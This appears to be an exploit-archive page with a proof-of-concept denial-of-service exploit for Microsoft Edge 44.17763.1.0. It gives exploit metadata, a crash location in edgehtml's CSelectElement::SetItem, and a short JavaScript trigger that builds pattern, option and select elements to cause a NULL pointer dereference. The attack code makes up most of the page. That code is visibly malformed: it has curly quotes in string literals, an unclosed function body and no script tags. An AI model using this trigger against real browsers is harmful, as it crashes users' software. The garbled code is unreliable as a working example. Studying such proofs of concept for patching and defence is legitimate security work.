Microsoft edge 44.17763.1.0 null pointer dereference Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2019-01-07 | Type : dos | Platform : windows
This exploit / vulnerability Microsoft edge 44.17763.1.0 null pointer dereference is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# Exploit Title: Microsoft Edge 44.17763.1.0 NULL Pointer Dereference. Denial of Service (PoC)
# Google Dork: N/A
# Date: 2018-11-14
# Exploit Author: Bogdan Kurinnoy (
# Vendor Homepage:
# Version: Microsoft Edge 44.17763.1.0 (Microsoft EdgeHTML 18.17763)
# Tested on: Windows 10 x64
# CVE : N/A

# Description:

# Access violation while reading memory at 0x2D0 using a NULL ptr edgehtml!CSelectElement::SetItem+0x190






function f1() {

try {var v1 = eventhandler1; } catch(e) { }

var v2 = document.createElementNS("", “pattern”);

v2.addEventListener("1", v1);

var v3 = document.createElement(“option”);

var v4 = document.createElement(“select”);

v4[4] = v3;




<body onload=f1()>

